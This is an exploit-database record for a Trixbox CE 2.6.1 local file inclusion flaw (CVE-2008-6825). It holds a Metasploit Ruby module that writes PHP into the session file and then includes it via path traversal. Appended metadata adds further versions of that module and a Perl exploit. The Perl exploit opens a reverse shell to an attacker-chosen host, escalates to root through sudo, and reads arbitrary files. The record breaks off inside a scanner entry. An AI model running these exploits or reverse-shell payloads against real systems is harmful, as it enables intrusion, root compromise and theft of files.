ID EDB-ID:16904
Type exploitdb
Reporter metasploit
Modified 2011-01-08T00:00:00
Description
Trixbox langChoice PHP Local File Inclusion. CVE-2008-6825. Webapps exploit for php platform
##
# $Id: trixbox_langchoice.rb 11516 2011-01-08 01:13:26Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
# -*- coding: utf-8 -*-
require 'msf/core'
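class Metasploit3 < Msf::Exploit::Remote
  Rank = ManualRanking

  # Captures the PHPSESSID value out of a raw Set-Cookie header string.
  # Both check and exploit depend on this cookie: the session id names
  # the server-side session file that the langChoice parameter is later
  # pointed at.
  PHPSESSID_REGEX = /(?:^|;?)PHPSESSID=(\w+)(?:;|$)/

  include Msf::Exploit::Remote::HttpClient

  # Module metadata and user-configurable options (URI, PATH).
  #
  # @param info [Hash] module information merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Trixbox langChoice PHP Local File Inclusion',
      'Description' => %q{
          This module injects php into the trixbox session file and then, in a second call, evaluates
        that code by manipulating the langChoice parameter as described in OSVDB-50421.
      },
      'Author' => ['chao-mu'],
      'License' => BSD_LICENSE,
      'Version' => '$Revision: 11516 $',
      'References' =>
        [
          ['OSVDB' => '50421'],
          ['CVE' => '2008-6825'],
          ['BID' => '30135'],
          ['URL' => 'http://www.exploit-db.com/exploits/6026/'],
          ['URL' => 'http://www.trixbox.org/']
        ],
      'Payload' =>
        {
          # max header length for Apache (8190),
          # http://httpd.apache.org/docs/2.2/mod/core.html#limitrequestfieldsize
          # minus 23 for good luck (and extra spacing)
          'Space' => 8190 - 23,
          'DisableNops' => true,
          'Compat' =>
            {
              'ConnectionType' => 'find',
            },
          'BadChars' => "'\"`" # quotes are escaped by PHP's magic_quotes_gpc in a default install
        },
      'Targets' => [['trixbox CE 2.6.1', {}]],
      'DefaultTarget' => 0,
      'Platform' => 'php',
      'Arch' => ARCH_PHP,
      'DisclosureDate' => 'Jul 09 2008'
    ))

    register_options(
      [
        OptString.new('URI', [true, 'The uri that accepts the langChoice param', '/user/index.php']),
        # !SESSIONID! is substituted with the PHPSESSID value at exploit time.
        OptString.new('PATH', [true, 'The path where the php was stored', '../../../../../../../../../../tmp/sess_!SESSIONID!%00']),
      ], self.class)
  end

  # Probe the target with a single POST and classify it.
  #
  # @return [Exploit::CheckCode]
  #   Unknown    - no HTTP response at all (proves nothing either way), or
  #                the page is reachable but carries neither fingerprint;
  #   Safe       - non-200 status, no PHPSESSID cookie issued, or no
  #                langChoice field in the page;
  #   Vulnerable - the exact "v2.6.1  ©2008 Fonality" footer is present;
  #   Detected   - only the generic "trixbox - User Mode" title is seen.
  def check
    # We need to ensure that this can be reached via POST
    uri = datastore['URI']
    target_code = 200

    print_status "Attempting to POST to #{uri}"
    response = send_request_cgi({'uri' => uri, 'method' => 'POST'})

    # `defined? response` was always true for an assigned local, so a nil
    # response (timeout) used to crash on response.code below. A
    # non-response is not evidence of safety, hence Unknown.
    if response.nil?
      print_error 'Server did not respond to HTTP POST request'
      return Exploit::CheckCode::Unknown
    end

    code = response.code

    unless code == target_code
      print_error "Expected HTTP code #{target_code}, but got #{code}."
      return Exploit::CheckCode::Safe
    end

    print_status "We received the expected HTTP code #{target_code}"

    # We will need the cookie PHPSESSID to continue
    cookies = response.headers['Set-Cookie']

    # Make sure a PHPSESSID cookie was set (nil-safe helper, no $1 global)
    session_id = phpsessid_from(cookies)
    if session_id
      print_status "We were successfully sent a PHPSESSID of '#{session_id}'"
    else
      print_error 'The server did not send us the cookie we were looking for'
      return Exploit::CheckCode::Safe
    end

    # Okay, at this point we're just being silly and hackish.
    unless response.body =~ /langChoice/
      print_error 'The page does not appear to contain a langChoice field'
      return Exploit::CheckCode::Safe
    end

    # XXX: Looking for a good way of determining if it is NOT trixbox
    # unless response.body.match(/trixbox - User Mode/)
    #   print_status 'The target does not appear to be running trixbox'
    #   return Exploit::CheckCode::Safe
    # end
    # print_status 'The target appears to be running trixbox'

    # If it has the target footer, we know it's vulnerable;
    # however skinning may mean the reverse is not true.
    # We've only tested on v2.6.1, so that is all we will guarantee.
    # Example footer: v2.6.1  ©2008 Fonality
    # if response.body =~ /(v2\.(?:[0-5]\.\d|6\.[0-1]))\s{2}©200[0-8] Fonality/
    footer = response.body.match(/(v2\.6\.1)\s{2}©2008 Fonality/)
    if footer
      print_status "Trixbox #{footer[1]} detected!"
      return Exploit::CheckCode::Vulnerable
    end

    print_status 'The target may be skinned making detection too difficult'

    if response.body =~ /trixbox - User Mode/
      Exploit::CheckCode::Detected
    else
      Exploit::CheckCode::Unknown
    end
  end

  # Two-stage run: stage 1 POSTs the payload as the langChoice value, which
  # the application stores verbatim in the PHP session file; stage 2 POSTs
  # the PATH option (session id substituted) as langChoice so the session
  # file is included. The stage-1 session file is left behind on the
  # target's /tmp, as the status message says.
  #
  # @raise [RuntimeError] when stage 1 gets no response, a non-200 status,
  #   no cookies, or no PHPSESSID cookie
  def exploit
    # We will be passing this our langChoice values
    uri = datastore['URI']

    # Prepare PHP file contents
    encoded_php_file = Rex::Text.uri_encode("<?php #{payload.encoded} ?>")

    # Deliver the payload
    print_status('Uploading the payload to the remote server')
    delivery_response = send_request_cgi({
      'uri' => uri,
      'method' => 'POST',
      'data' => "langChoice=#{encoded_php_file}%00"
    })

    # A nil response used to surface as NoMethodError on .code; report it.
    if delivery_response.nil?
      raise RuntimeError, 'Server did not respond to HTTP POST request'
    end

    # The call should return status code 200
    if delivery_response.code != 200
      raise RuntimeError, "Server returned unexpected HTTP code #{delivery_response.code}"
    end

    print_status "The server responded to POST with HTTP code #{delivery_response.code}"

    # We will need the cookie PHPSESSID to continue.
    # NOTE(review): this is the raw Set-Cookie header value and is echoed
    # back verbatim as the Cookie header below, attributes included.
    cookies = delivery_response.headers['Set-Cookie']

    # Make sure cookies were set
    if cookies.nil?
      raise RuntimeError, 'The server did not set any cookies'
    end

    # Retrieve the session id from PHPSESSID
    session_id = phpsessid_from(cookies)
    if session_id.nil?
      raise RuntimeError, 'The cookie PHPSESSID was not set.'
    end

    print_status "We were assigned a session id (cookie PHPSESSID) of '#{session_id}'"

    # Prepare the value that will execute our payload
    detonation = datastore['PATH'].sub('!SESSIONID!', session_id)

    print_status "We will use '#{detonation}' as the value of langChoice to detonate the payload"

    # Request the detonation uri, detonating the payload
    print_status 'Attempting to detonate. You will need to clean /tmp/ yourself.'

    # 0.01s timeout: the included file runs the payload and the request may
    # never return, so success is assumed and the handler is started.
    send_request_cgi({
      'uri' => uri,
      'cookie' => cookies,
      'method' => 'POST',
      'data' => "langChoice=#{detonation}%00"
    }, 0.01)

    handler
  end

  private

  # Extracts the PHPSESSID value from a raw Set-Cookie header string.
  #
  # @param cookies [String, nil] the Set-Cookie header value
  # @return [String, nil] the session id, or nil when absent
  def phpsessid_from(cookies)
    match = cookies && PHPSESSID_REGEX.match(cookies)
    match && match[1]
  end
end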
{"id": "EDB-ID:16904", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Trixbox CE 2.6.1 - langChoice PHP Local File Inclusion", "description": "Trixbox langChoice PHP Local File Inclusion. CVE-2008-6825. Webapps exploit for php platform", "published": "2011-01-08T00:00:00", "modified": "2011-01-08T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/16904/", "reporter": "metasploit", "references": [], "cvelist": ["CVE-2008-6825"], "lastseen": "2016-02-02T06:47:19", "viewCount": 3, "enchantments": {"score": {"value": 6.5, "vector": "NONE", "modified": "2016-02-02T06:47:19", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-6825"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/UNIX/WEBAPP/TRIXBOX_LANGCHOICE"]}, {"type": "nessus", "idList": ["TRIXBOX_LANGCHOICE_FILE_INCLUDE.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:6026"]}], "modified": "2016-02-02T06:47:19", "rev": 2}, "vulnersScore": 6.5}, "sourceHref": "https://www.exploit-db.com/download/16904/", "sourceData": "##\r\n# $Id: trixbox_langchoice.rb 11516 2011-01-08 01:13:26Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n# -*- coding: utf-8 -*-\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ManualRanking\r\n\r\n\tPHPSESSID_REGEX = /(?:^|;?)PHPSESSID=(\\w+)(?:;|$)/\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Trixbox langChoice PHP Local File Inclusion',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module injects php into the trixbox session file and then, in a second call, evaluates\r\n\t\t\t\tthat code by manipulating the langChoice parameter as described in OSVDB-50421.\r\n\t\t\t},\r\n\t\t\t'Author' => ['chao-mu'],\r\n\t\t\t'License' => BSD_LICENSE,\r\n\t\t\t'Version' => '$Revision: 11516 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['OSVDB' => '50421'],\r\n\t\t\t\t\t['CVE' => '2008-6825'],\r\n\t\t\t\t\t['BID' => '30135'],\r\n\t\t\t\t\t['URL' => 'http://www.exploit-db.com/exploits/6026/'],\r\n\t\t\t\t\t['URL' => 'http://www.trixbox.org/']\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t# max header length for Apache (8190),\r\n\t\t\t\t\t# http://httpd.apache.org/docs/2.2/mod/core.html#limitrequestfieldsize\r\n\t\t\t\t\t# minus 23 for good luck (and extra spacing)\r\n\t\t\t\t\t'Space' => 8190 - 23,\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'Compat' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'ConnectionType' => 'find',\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t'BadChars' => \"'\\\"`\" # quotes are escaped by PHP's magic_quotes_gpc in a default install\r\n\t\t\t\t},\r\n\t\t\t'Targets' => [['trixbox CE 2.6.1', {}]],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'Platform' => 'php',\r\n\t\t\t'Arch' => ARCH_PHP,\r\n\t\t\t'DisclosureDate' => 'Jul 09 2008'\r\n\t\t))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('URI', [true, 'The uri that accepts the langChoice param', 
'/user/index.php']),\r\n\t\t\t\tOptString.new('PATH', [true, 'The path where the php was stored', '../../../../../../../../../../tmp/sess_!SESSIONID!%00']),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef check\r\n\t\t# We need to ensure that this can be reached via POST\r\n\t\turi = datastore['URI']\r\n\t\ttarget_code = 200\r\n\r\n\t\tprint_status \"Attempting to POST to #{uri}\"\r\n\t\tresponse = send_request_cgi({'uri' => uri, 'method' => 'POST'})\r\n\r\n\t\tunless defined? response\r\n\t\t\tprint_error 'Server did not respond to HTTP POST request'\r\n\t\t\treturn Exploit::CheckCode::Safe\r\n\t\tend\r\n\r\n\t\tcode = response.code\r\n\r\n\t\tunless code == target_code\r\n\t\t\tprint_error \"Expected HTTP code #{target_code}, but got #{code}.\"\r\n\t\t\treturn Exploit::CheckCode::Safe\r\n\t\tend\r\n\r\n\t\tprint_status \"We received the expected HTTP code #{target_code}\"\r\n\r\n\t\t# We will need the cookie PHPSESSID to continue\r\n\t\tcookies = response.headers['Set-Cookie']\r\n\r\n\t\t# Make sure cookies were set\r\n\t\tif defined? 
cookies and cookies =~ PHPSESSID_REGEX\r\n\t\t\tprint_status \"We were successfully sent a PHPSESSID of '#{$1}'\"\r\n\t\telse\r\n\t\t\tprint_error 'The server did not send us the cookie we were looking for'\r\n\t\t\treturn Exploit::CheckCode::Safe\r\n\t\tend\r\n\r\n\t\t# Okay, at this point we're just being silly and hackish.\r\n\t\tunless response.body =~ /langChoice/\r\n\t\t\tprint_error 'The page does not appear to contain a langChoice field'\r\n\t\t\treturn Exploit::CheckCode::Safe\r\n\t\tend\r\n\r\n\t\t# XXX: Looking for a good way of determine if it is NOT trixbox\r\n\t\t# unless response.body.match(/trixbox - User Mode/)\r\n\t\t# \tprint_status 'The target does not appear to be running trixbox'\r\n\t\t# \treturn Exploit::CheckCode::Safe\r\n\t\t# end\r\n\t\t# print_status 'The target appears to be running trixbox'\r\n\r\n\t\t# If it has the target footer, we know its vulnerable\r\n\t\t# however skining may mean the reverse is not true\r\n\t\t# We've only tested on v2.6.1, so that is all we will guarantee\r\n\t\t# Example footer: v2.6.1 \u00c2\u01602008 Fonality\r\n#\t\tif response.body =~ /(v2\\.(?:[0-5]\\.\\d|6\\.[0-1]))\\s{2}©200[0-8] Fonality/\r\n\t\tif response.body =~ /(v2\\.6\\.1)\\s{2}©2008 Fonality/\r\n\t\t\tprint_status \"Trixbox #{$1} detected!\"\r\n\t\t\treturn Exploit::CheckCode::Vulnerable\r\n\t\tend\r\n\r\n\t\tprint_status 'The target may be skinned making detection too difficult'\r\n\r\n\t\tif response.body =~ /trixbox - User Mode/\r\n\t\t\treturn Exploit::CheckCode::Detected\r\n\t\telse\r\n\t\t\treturn Exploit::CheckCode::Unknown\r\n\t\tend\r\n\tend\r\n\r\n\tdef exploit\r\n\t\t# We will be be passing this our langChoice values\r\n\t\turi = datastore['URI']\r\n\r\n\t\t# Prepare PHP file contents\r\n\t\tencoded_php_file = Rex::Text.uri_encode(\"<?php #{payload.encoded} ?>\")\r\n\r\n\t\t# Deliver the payload\r\n\t\tprint_status('Uploading the payload to the remote server')\r\n\t\tdelivery_response = send_request_cgi({\r\n\t\t\t\t'uri' => 
uri,\r\n\t\t\t\t'method' => 'POST',\r\n\t\t\t\t'data' => \"langChoice=#{encoded_php_file}%00\"\r\n\t\t\t})\r\n\r\n\t\t# The call should return status code 200\r\n\t\tif delivery_response.code != 200\r\n\t\t\traise RuntimeError, \"Server returned unexpected HTTP code #{delivery_response.code}\"\r\n\t\tend\r\n\r\n\t\tprint_status \"The server responded to POST with HTTP code #{delivery_response.code}\"\r\n\r\n\t\t# We will need the cookie PHPSESSID to continue\r\n\t\tcookies = delivery_response.headers['Set-Cookie']\r\n\r\n\t\t# Make sure cookies were set\r\n\t\tif cookies.nil?\r\n\t\t\traise RuntimeError, 'The server did not set any cookies'\r\n\t\tend\r\n\r\n\t\t# Contents of PHPSESSID. About to be set.\r\n\t\tsession_id = nil\r\n\r\n\t\t# Retrieve the session id from PHPSESSID\r\n\t\tif cookies =~ PHPSESSID_REGEX\r\n\t\t\tsession_id = $1\r\n\t\telse\r\n\t\t\traise RuntimeError, 'The cookie PHPSESSID was not set.'\r\n\t\tend\r\n\r\n\t\tprint_status \"We were assigned a session id (cookie PHPSESSID) of '#{session_id}'\"\r\n\r\n\t\t# Prepare the value that will execute our payload\r\n\t\tdetonation = datastore['PATH'].sub('!SESSIONID!', session_id)\r\n\r\n\t\tprint_status \"We will use '#{detonation}' as the value of langChoice to detonate the payload\"\r\n\r\n\t\t# Request the detonation uri, detonating the payload\r\n\t\tprint_status 'Attempting to detonate. You will need to clean /tmp/ yourself.'\r\n\r\n\t\t# Small timeout as we're just going to assume we succeeded.\r\n\t\tsend_request_cgi({\r\n\t\t\t\t'uri' => uri,\r\n\t\t\t\t'cookie' => cookies,\r\n\t\t\t\t'method' => 'POST',\r\n\t\t\t\t'data' => \"langChoice=#{detonation}%00\"\r\n\t\t\t}, 0.01)\r\n\r\n\t\thandler\r\n\tend\r\nend\r\n", "osvdbidlist": ["50421"]}
{"cve": [{"lastseen": "2020-12-09T19:28:28", "description": "Directory traversal vulnerability in user/index.php in Fonality trixbox CE 2.6.1 and earlier allows remote attackers to include and execute arbitrary files via a .. (dot dot) in the langChoice parameter.", "edition": 5, "cvss3": {}, "published": "2009-06-05T21:30:00", "title": "CVE-2008-6825", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-6825"], "modified": "2017-09-29T01:33:00", "cpe": ["cpe:/a:trixbox:trixbox:2.6.1", "cpe:/a:trixbox:trixbox:2.4.2.0", "cpe:/a:trixbox:trixbox:2.0"], "id": "CVE-2008-6825", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-6825", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:trixbox:trixbox:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:trixbox:trixbox:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:trixbox:trixbox:2.4.2.0:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-01-31T23:03:32", "description": "trixbox (langChoice) Local File Inclusion Exploit (connect-back) v2. CVE-2008-6825. 
Remote exploit for linux platform", "published": "2008-07-09T00:00:00", "type": "exploitdb", "title": "trixbox langChoice - Local File Inclusion Exploit connect-back 2", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-6825"], "modified": "2008-07-09T00:00:00", "id": "EDB-ID:6026", "href": "https://www.exploit-db.com/exploits/6026/", "sourceData": "#!/usr/bin/perl -w\r\n\r\n# Jean-Michel BESNARD <jmbesnard@gmail.com> / LEXSI Audit\r\n# 2008-07-09\r\n# This is an update of the previous exploit. We can now get a root shell, thanks to sudo.\r\n#\r\n# perl trixbox_fi_v2.pl 192.168.1.212\r\n# Please listen carefully as our menu option has changed\r\n# Choose from the following options:\r\n# 1> Remote TCP shell\r\n# 2> Read local file\r\n# 1\r\n# Host and port the reverse shell should connect to ? (<host>:<port>): 192.168.1.132:4444\r\n# Which uid would you like for your shell ? (uid=root will be OK on most recent trixbox versions only): [root|asterisk]\r\n# root\r\n# Make sure you've opened a server socket on port 4444 at 192.168.1.132 (e.g, nc -l -p 4444)\r\n# Press enter to continue...\r\n# done...\r\n\r\n# nc -l -v -p 4444\r\n# listening on [any] 4444 ...\r\n# connect to [192.168.1.132] from lexsi-abo-new.lexsi.com [192.168.1.212] 48397\r\n# bash: no job control in this shell\r\n# bash-3.1# id\r\n# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)\r\n# bash-3.1# \r\n\r\n\r\nuse strict;\r\nuse Switch;\r\nuse LWP::UserAgent;\r\nuse HTTP::Cookies;\r\n\r\nusage() unless @ARGV;\r\nmy $url = \"http://$ARGV[0]/user/index.php\";\r\nmy $ua = LWP::UserAgent->new;\r\nmy $cookie_jar = HTTP::Cookies->new;\r\n$ua->cookie_jar($cookie_jar);\r\n\r\nmenu();\r\n\r\nsub execScript{\r\n my $scriptCode = shift;\r\n post($scriptCode);\r\n my $phpsessionid = extractPHPSID($cookie_jar->as_string);\r\n post(\"langChoice=../../../../../../../../../../tmp/sess_$phpsessionid%00\");\r\n}\r\n\r\nsub post{\r\n my $postData = shift;\r\n my $req = 
HTTP::Request->new(POST => $url);\r\n $req->content_type('application/x-www-form-urlencoded');\r\n $req->content($postData);\r\n my $res = $ua->request($req);\r\n my $content = $res->content;\r\n return $content;\r\n}\r\n\r\nsub readFile{\r\n my $file = shift;\r\n my $content = post(\"langChoice=../../../../../../../../../..$file%00\");\r\n my @fileLines = split(/\\n/,$content);\r\n my $fileContent = \"Content of $file: \\n\\n\";\r\n for(my $i=3;$i<@fileLines;$i++){\r\n\tlast if($fileLines[$i] =~ m/trixbox - User Mode/);\r\n\t$fileContent = $fileContent . $fileLines[$i-3] . \"\\n\";\r\n }\r\n return $fileContent;\r\n}\r\n\r\nsub tcp_reverse_shell{\r\n my $rhost= shift;\r\n my $rport = shift;\r\n my $uid = shift;\r\n my $rshell;\r\n if($uid eq \"asterisk\"){\r\n\t$rshell = \"langChoice=<?php `/usr/bin/perl -MSocket -e '\\\\\\$p=fork;exit,if(\\\\\\$p);socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp'));connect(S, sockaddr_in($rport,inet_aton(\\\"$rhost\\\")));open(STDIN, \\\">%26S\\\");open(STDOUT,\\\">%26S\\\");open(STDERR,\\\">%26S\\\");exec({\\\"/bin/sh\\\"} (\\\"JMB\\\", \\\"-i\\\"));'`;?>%00\";\r\n\r\n }else{\r\n\t$rshell = \"langChoice=<?php `/usr/bin/perl -MSocket -e '\\\\\\$p=fork;exit,if(\\\\\\$p);socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp'));connect(S, sockaddr_in($rport,inet_aton(\\\"$rhost\\\")));open(STDIN, \\\">%26S\\\");open(STDOUT,\\\">%26S\\\");open(STDERR,\\\">%26S\\\");exec(\\\"/usr/bin/sudo\\\",\\\"/bin/bash\\\", (\\\"-i\\\"));'`;?>%00\";\r\n }\r\n execScript($rshell);\r\n}\r\n\r\n\r\nsub extractPHPSID{\r\n $_ = shift;\r\n if(/PHPSESSID=(\\w+)/){\r\n\treturn $1;\r\n } \r\n}\r\n\r\nsub menu{\r\n print <<EOF;\r\nPlease listen carefully as our menu option has changed\r\nChoose from the following options:\r\n 1> Remote TCP shell\r\n 2> Read local file\r\nEOF\r\n my $option = <STDIN>;\r\n chop($option);\r\n switch($option){\r\n\tcase 1 {\r\n\t print \"Host and port the reverse shell should connect to ? 
\";\r\n\t print \"(<host>:<port>): \";\r\n\t my $hp=<STDIN>;\r\n\t chop($hp);\r\n\t print \"Which uid would you like for your shell ? (uid=root will be OK on most recent trixbox versions only): [root|asterisk]\";\r\n\t my $uid=<STDIN>;\r\n\t chop($uid);\r\n\t my($rhost,$rport) = split(/:/,$hp);\r\n\t print \"Make sure you've opened a server socket on port $rport at $rhost (e.g, nc -l -p $rport)\\n\";\r\n\t print \"Press enter to continue...\";\r\n\t <STDIN>;\r\n\t tcp_reverse_shell($rhost,$rport,$uid);\r\n\t print \"done...\\n\";\r\n\t }\r\n\tcase 2 {\r\n\t while(1){\r\n\t\tprint \"Full path (e.g. /etc/passwd): \";\r\n\t\tmy $file = <STDIN>;\r\n\t\tchop($file);\r\n\t\tprint readFile($file) . \"\\n\\n\";\r\n\t }\r\n\t}\r\n }\r\n}\r\n\r\nsub usage{\r\n print \"./trixbox_fi.pl <host>\\n\";\r\n exit 1;\r\n}\r\n\r\n# milw0rm.com [2008-07-09]\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/6026/"}], "metasploit": [{"lastseen": "2020-07-02T02:35:54", "description": "This module injects php into the trixbox session file and then, in a second call, evaluates that code by manipulating the langChoice parameter as described in OSVDB-50421.\n", "published": "2010-12-07T17:44:47", "type": "metasploit", "title": "Trixbox langChoice PHP Local File Inclusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-6825"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/UNIX/WEBAPP/TRIXBOX_LANGCHOICE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n# -*- coding: utf-8 -*-\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n PHPSESSID_REGEX = /(?:^|;?)PHPSESSID=(\\w+)(?:;|$)/\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trixbox langChoice PHP Local File Inclusion',\n 
'Description' => %q{\n This module injects php into the trixbox session file and then, in a second call, evaluates\n that code by manipulating the langChoice parameter as described in OSVDB-50421.\n },\n 'Author' => ['chao-mu'],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['OSVDB', '50421'],\n ['CVE', '2008-6825'],\n ['BID', '30135'],\n ['EDB', '6026' ],\n ['URL', 'http://www.trixbox.org/']\n ],\n 'Payload' =>\n {\n # max header length for Apache (8190),\n # http://httpd.apache.org/docs/2.2/mod/core.html#limitrequestfieldsize\n # minus 23 for good luck (and extra spacing)\n 'Space' => 8190 - 23,\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'ConnectionType' => 'find',\n },\n 'BadChars' => \"'\\\"`\" # quotes are escaped by PHP's magic_quotes_gpc in a default install\n },\n 'Targets' => [['trixbox CE 2.6.1', {}]],\n 'DefaultTarget' => 0,\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'DisclosureDate' => 'Jul 09 2008'\n ))\n\n register_options(\n [\n OptString.new('URI', [true, 'The uri that accepts the langChoice param', '/user/index.php']),\n OptString.new('PATH', [true, 'The path where the php was stored', '../../../../../../../../../../tmp/sess_!SESSIONID!%00']),\n ])\n end\n\n def check\n # We need to ensure that this can be reached via POST\n uri = normalize_uri(datastore['URI'])\n target_code = 200\n\n vprint_status \"Attempting to POST to #{uri}\"\n response = send_request_cgi({'uri' => uri, 'method' => 'POST'})\n\n unless defined? response\n vprint_error 'Server did not respond to HTTP POST request'\n return Exploit::CheckCode::Unknown\n end\n\n code = response.code\n\n unless code == target_code\n vprint_error \"Expected HTTP code #{target_code}, but got #{code}.\"\n return Exploit::CheckCode::Safe\n end\n\n vprint_status \"We received the expected HTTP code #{target_code}\"\n\n # We will need the cookie PHPSESSID to continue\n cookies = response.get_cookies\n\n # Make sure cookies were set\n if defined? 
cookies and cookies =~ PHPSESSID_REGEX\n vprint_good \"We were successfully sent a PHPSESSID of '#{$1}'\"\n else\n vprint_error 'The server did not send us the cookie we were looking for'\n return Exploit::CheckCode::Safe\n end\n\n # Okay, at this point we're just being silly and hackish.\n unless response.body =~ /langChoice/\n vprint_error 'The page does not appear to contain a langChoice field'\n return Exploit::CheckCode::Safe\n end\n\n # XXX: Looking for a good way of determine if it is NOT trixbox\n # unless response.body.match(/trixbox - User Mode/)\n # \tprint_status 'The target does not appear to be running trixbox'\n # \treturn Exploit::CheckCode::Safe\n # end\n # print_status 'The target appears to be running trixbox'\n\n # If it has the target footer, we know its vulnerable\n # however skining may mean the reverse is not true\n # We've only tested on v2.6.1, so that is all we will guarantee\n # Example footer: v2.6.1 ©2008 Fonality\n#\t\tif response.body =~ /(v2\\.(?:[0-5]\\.\\d|6\\.[0-1]))\\s{2}©200[0-8] Fonality/\n if response.body =~ /(v2\\.6\\.1)\\s{2}©2008 Fonality/\n vprint_status \"Trixbox #{$1} detected!\"\n return Exploit::CheckCode::Appears\n end\n\n vprint_status 'The target may be skinned making detection too difficult'\n\n if response.body =~ /trixbox - User Mode/\n return Exploit::CheckCode::Detected\n end\n\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n # We will be be passing this our langChoice values\n uri = normalize_uri(datastore['URI'])\n\n # Prepare PHP file contents\n encoded_php_file = Rex::Text.uri_encode(\"<?php #{payload.encoded} ?>\")\n\n # Deliver the payload\n print_status('Uploading the payload to the remote server')\n delivery_response = send_request_cgi({\n 'uri' => uri,\n 'method' => 'POST',\n 'data' => \"langChoice=#{encoded_php_file}%00\"\n })\n\n # The call should return status code 200\n if delivery_response.code != 200\n fail_with(Failure::NotFound, \"Server returned unexpected HTTP code 
#{delivery_response.code}\")\n end\n\n print_status \"The server responded to POST with HTTP code #{delivery_response.code}\"\n\n # We will need the cookie PHPSESSID to continue\n cookies = delivery_response.get_cookies\n\n # Make sure cookies were set\n if cookies.nil?\n fail_with(Failure::NotFound, 'The server did not set any cookies')\n end\n\n # Contents of PHPSESSID. About to be set.\n session_id = nil\n\n # Retrieve the session id from PHPSESSID\n if cookies =~ PHPSESSID_REGEX\n session_id = $1\n else\n fail_with(Failure::NotFound, 'The cookie PHPSESSID was not set.')\n end\n\n print_status \"We were assigned a session id (cookie PHPSESSID) of '#{session_id}'\"\n\n # Prepare the value that will execute our payload\n detonation = datastore['PATH'].sub('!SESSIONID!', session_id)\n\n print_status \"We will use '#{detonation}' as the value of langChoice to detonate the payload\"\n\n # Request the detonation uri, detonating the payload\n print_status 'Attempting to detonate. You will need to clean /tmp/ yourself.'\n\n # Small timeout as we're just going to assume we succeeded.\n send_request_cgi({\n 'uri' => uri,\n 'cookie' => cookies,\n 'method' => 'POST',\n 'data' => \"langChoice=#{detonation}%00\"\n }, 0.01)\n\n handler\n end\nend\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/trixbox_langchoice.rb"}], "nessus": [{"lastseen": "2021-01-20T15:18:49", "description": "The version of trixbox dashboard installed on the remote host fails to\nsanitize user-supplied input to the 'langChoice' parameter of the\n'user/index.php' script before using it to include PHP code.\nRegardless of PHP's 'register_globals' setting, an unauthenticated\nattacker could leverage this issue to view arbitrary files or to\nexecute arbitrary PHP code on the remote host, subject to the\nprivileges of the web server user id.", "edition": 28, "published": 
